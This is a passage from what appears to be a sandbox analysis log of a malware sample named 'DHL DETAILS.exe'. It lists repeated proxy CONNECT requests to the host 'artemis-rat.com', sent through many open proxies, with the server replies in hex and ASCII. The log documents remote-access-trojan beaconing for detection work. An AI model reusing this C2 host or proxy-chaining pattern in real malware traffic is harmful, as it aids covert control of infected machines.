Mar 9, 2024 13:14:13.386262894 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
259	192.168.2.5	50907	104.21.223.181	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.233541012 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.388700008 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
260	192.168.2.5	50681	178.54.21.203	8081	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.235349894 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
261	192.168.2.5	50848	38.162.15.98	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.255844116 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.695621967 CET	111	IN	HTTP/1.1 407 Proxy Authentication Required Proxy-Authenticate: Basic realm="" Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 Data Ascii: Proxy Authentication Required

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
262	192.168.2.5	50797	43.163.192.3	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.256187916 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
263	192.168.2.5	50703	52.67.10.183	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.256674051 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.585067987 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:13 GMT Server: nginx Content-Type: text/plain Content-Length: 0
Mar 9, 2024 13:14:13.585453033 CET	177	OUT	Data Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 94 a1 ad b8 cc 97 18 e2 c0 a1 a2 04 af 0d 72 26 e9 e9 c8 6f 87 c6 23 87 71 81 26 37 ef 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c Data Ascii: eRr&o#q&7*,+0/$#('=<5/Uartemis-rat.com#
Mar 9, 2024 13:14:13.912369013 CET	1079	IN	Data Raw: 16 03 03 00 3d 02 00 00 39 03 03 88 72 46 5b b8 1e 03 1b 94 25 e3 71 eb 8b 05 67 e5 db 5e 96 f5 98 51 3a 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30 Data Ascii: =9rF[%qg^Q:DOWNGRD0000H010Uartemis-rat.com0240309121340Z260309121340Z010Uartemis-rat.com0"0H0Z~fVz'
Mar 9, 2024 13:14:14.266180038 CET	93	OUT	Data Raw: 16 03 03 00 25 10 00 00 21 20 39 e6 4d 05 0a 0d 6b 77 61 5b c0 95 62 83 66 43 d9 dc b6 83 5b 6d 86 b2 74 ee 13 2d 8f 8c 64 5e 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 c2 52 b8 b2 14 b8 c8 cd d0 f7 d9 f6 82 e3 e1 e7 4b 80 65 f0 05 Data Ascii: %! 9Mkwa[bfC[mt-d^(RKe*Bq&
Mar 9, 2024 13:14:14.591711044 CET	51	IN	Data Raw: 14 03 03 00 01 01 16 03 03 00 28 f9 03 3f 85 bc 59 27 31 da 23 d5 a7 69 48 1d 59 f8 df ca 39 a3 dd 41 ee a6 24 9f 80 68 53 8d 53 5b 8c 53 af 2b 7a af f0 Data Ascii: (?Y'1#iHY9A$hSS[S+z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
264	192.168.2.5	50917	162.159.241.5	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.256931067 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.419702053 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
265	192.168.2.5	50926	104.23.125.117	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.256932020 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.413084030 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
266	192.168.2.5	51192	202.159.60.65	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.257108927 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
267	192.168.2.5	50706	87.247.251.240	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.257179976 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.942467928 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.926872969 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.036585093 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.037066936 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
268	192.168.2.5	50033	120.194.4.157	5443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.257191896 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.278430939 CET	319	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Sat, 09 Mar 2024 12:14:14 GMT Content-Type: text/html Content-Length: 170 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
269	192.168.2.5	50727	167.172.91.219	8000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.257483006 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.597507954 CET	19	IN	HTTP/1.0 200 OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
270	192.168.2.5	51197	202.159.60.65	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.258752108 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
271	192.168.2.5	51201	41.86.252.91	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.259509087 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
272	192.168.2.5	51202	202.159.60.65	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.260350943 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
273	192.168.2.5	51207	202.159.60.65	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.261432886 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
274	192.168.2.5	51208	41.86.252.91	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.261575937 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
275	192.168.2.5	51211	41.86.252.91	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.263442039 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
276	192.168.2.5	51213	41.86.252.91	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.264744043 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
277	192.168.2.5	50738	125.94.219.96	9091	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.267013073 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.607089043 CET	325	IN	HTTP/1.1 400 Bad Request Server: nginx/1.12.1 Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 173 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
278	192.168.2.5	50963	172.67.181.149	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.271764994 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.427676916 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
279	192.168.2.5	50962	104.16.143.127	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.271975040 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.427602053 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
280	192.168.2.5	50973	104.25.231.184	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.274331093 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.430671930 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
281	192.168.2.5	50751	37.18.73.60	5566	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.274348974 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.642205000 CET	729	IN	HTTP/1.0 501 Tor is not an HTTP Proxy Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00 Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a 